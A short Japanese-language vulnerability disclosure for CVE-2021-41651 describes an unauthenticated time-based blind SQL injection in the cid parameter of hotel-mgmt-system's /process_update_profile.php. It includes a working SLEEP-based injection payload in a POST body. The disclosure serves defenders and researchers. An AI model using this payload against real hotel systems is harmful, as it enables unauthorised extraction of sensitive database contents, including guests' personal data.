
CVE-2021-41651 用の概念実証エクスプロイト。hotel-mgmt-system における cid パラメータを介した認証不要の時間ベースのブラインドSQLインジェクションを実証し、MySQL からの機密データの抽出を可能にします。
CVE-2021-41651 SQLインジェクション(hotel-mgmt-system)
hotel-mgmt-system は、認証不要の時間ベースブラインドSQLインジェクション攻撃に対して脆弱です。
/process_update_profile.php ページの cid パラメータはユーザー入力を適切にサニタイズしておらず、攻撃者は基盤となるMySQLデータベースから機密データを抽出できます。
URL: /process_update_profile.php
パラメータ: cid
パラメータ: cid ((custom) POST)
タイプ: time-based blind
タイトル: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
ペイロード: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
2021年9月23日